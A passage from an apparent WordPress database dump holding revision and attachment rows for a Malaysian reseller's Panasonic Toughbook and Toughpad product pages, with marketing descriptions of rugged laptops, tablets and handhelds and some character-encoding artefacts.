certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n			<h4>TOUGHBOOK N1</h4>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Tablets</h3>		\n			<h2>TOUGHBOOK L1</h2>		\n			<h2>TOUGHPAD FZ-M1</h2>		\n			<h2>TOUGHPAD FZ-G1</h2>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>Â </p><h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>Â </p><h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>Â </p>		\n			<h2>TOUGHPAD FZ-A2</h2>		\n			<h2>TOUGHPAD FZ-B2</h2>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>Â </p><h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>Â </p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-20 10:28:10','2018-12-20 02:28:10','',2580,'https://bintara.com.my/blog/2018/12/20/2580-revision-v1/',0,'revision','',0),(2609,1,'2018-12-20 10:22:27','2018-12-20 02:22:27','','fz-l1_right_ss','','inherit','closed','closed','','fz-l1_right_ss','','','2018-12-20 10:22:27','2018-12-20 02:22:27','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg',0,'attachment','image/jpeg',0),(2610,1,'2018-12-20 10:22:50','2018-12-20 02:22:50','','fz-m1_image_01_new_win10','','inherit','closed','closed','','fz-m1_image_01_new_win10','','','2018-12-20 10:22:50','2018-12-20 02:22:50','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg',0,'attachment','image/jpeg',0),(2611,1,'2018-12-20 10:23:15','2018-12-20 02:23:15','','fz-g1mk5_us_image02_ss','','inherit','closed','closed','','fz-g1mk5_us_image02_ss','','','2018-12-20 10:23:15','2018-12-20 02:23:15','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg',0,'attachment','image/jpeg',0),(2612,1,'2018-12-20 10:23:55','2018-12-20 02:23:55','','tb_fz_a2_hero_front (1)','','inherit','closed','closed','','tb_fz_a2_hero_front-1','','','2018-12-20 10:23:55','2018-12-20 02:23:55','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png',0,'attachment','image/png',0),(2613,1,'2018-12-20 10:24:20','2018-12-20 02:24:20','','prod-jtb2-hero','','inherit','closed','closed','','prod-jtb2-hero','','','2018-12-20 10:24:20','2018-12-20 02:24:20','',2580,'https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png',0,'attachment','image/png',0),(2615,1,'2018-12-20 10:31:05','2018-12-20 02:31:05','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n			<h4>TOUGHBOOK 31</h4>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"1\" ]</p><header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n			<h4>TOUGHBOOK N1</h4>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"1\" ]</p><h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>Â </p><h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>Â </p><h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>Â </p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>Â </p><h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>Â </p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-20 10:31:05','2018-12-20 02:31:05','',2580,'https://bintara.com.my/blog/2018/12/20/2580-revision-v1/',0,'revision','',0),(2617,1,'2018-12-20 10:38:29','2018-12-20 02:38:29','<h3>Toughbook and Toughpad Range</h3>\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nWhatever your sector, whatever your challenge, whatever your working conditions, there will be a Toughbook solution for you, ranging from the ultra-durability of our fully ruggedised Toughbook and Toughpad devices through to our super stylish Toughpad 4K. All models are designed for your needs with the latest technologies and are capable of withstanding the conditions you operate in and can help you go further, achieve more and transform the way you work.\r\n\r\n<img class=\"alignnone size-full wp-image-2195\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Image-2a_1_0.jpg\" alt=\"\" width=\"1200\" height=\"420\" />\r\n<h5>The Fully Rugged Toughbook models meet the demands of the most challenging working environments</h5>\r\nThe fully rugged Toughbook models are dust, water, vibration and drop proof from a height of up to 180cm. The Toughbook range is designed to operate in both extremely low and high temperatures, and come in a variety of formats from laptop to tablet.\r\n\r\nAs well as being resistant to hostile and demanding environments such as construction sites, hospitals, underground excavations, emergency situations encountered by the emergency services, airline maintenance and management, utility services maintenance, and transport, they offer daylight visible screens, excellent graphics and long battery life. The fully rugged Toughbook models can meet almost every challenge business, utility or military service can deliver and ensure that mobile workers can access volumes of data and deliver information in real time wherever they are, increasing efficiency and productivity.\r\n\r\n<img class=\"alignnone size-full wp-image-2196\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Image-4b_0.jpg\" alt=\"\" width=\"1200\" height=\"420\" />\r\n<h5>The Semi Rugged and Business Ruggedised Toughbook models</h5>\r\nSemi Rugged Toughbook modelsÂ are water resistant and capable of withstanding being dropped* with a toughened casing. Semi Rugged notebook and convertible tablet models mean these mobile business computing solutions support workers in the field in diverse circumstances such as enabling police officers to take witness statements electronically, telephone engineers to work more effectively across the network and business travelers to effectively deliver presentations using the flip screen technology of the CF-C2.\r\n\r\nLong battery life, optional GPS and the option of technology that allows batteries to be changed whilst working, mean there is a model of semi rugged Toughbook suitable for every business that needs robust mobile computing solutions.\r\n\r\nThe Toughbook flip over business ruggedisedÂ CF-MX4Â is light, with an attractive design making it perfect for the busy business traveler allowing them to keep in touch with the office and work effectively on the move. The Toughbook is resistant to being dropped,* and withstands 100kg/f pressure, providing business travelers a robust alternative to more fragile mobile computing options.\r\n<h6>*From a height of 76cm.</h6>\r\n<img class=\"alignnone size-full wp-image-2197\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CF-MX4_bannerimage_v2_0_0_0.jpg\" alt=\"\" width=\"1200\" height=\"419\" />\r\n<h5>Computer docking solutions and accessories make Toughbook and Toughpad versatile and convenient</h5>\r\nWe offer a range of docking solutions, car chargers, battery chargers, bags, carrying straps and other accessories to ensure your business gets optimum performance from your Panasonic Toughbook and Toughpad devices. Click the link below to find out more about what is available.\r\n<h5>Professional Services to help you manage Toughbook and Toughpad hardware</h5>\r\nPanasonic is committed to providing you with the right computer product solution for your business. This is reflected in the range of professional services we offer. We can help with deployment to your workforce ensuring they have all the tools they need to work effectively and offer a buy-back programme for larger customers, to help you manage your investment in mobile working.\r\n\r\nTo discover more about the Toughbook and Toughpad range, please click the buttons below or contact us to discuss your needs.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]Â  Â  Â [maxbutton id=\"4\" ]\r\n\r\n</div>\r\n</div>','Panasonic Toughbook','','inherit','closed','closed','','1571-revision-v1','','','2018-12-20 10:38:29','2018-12-20 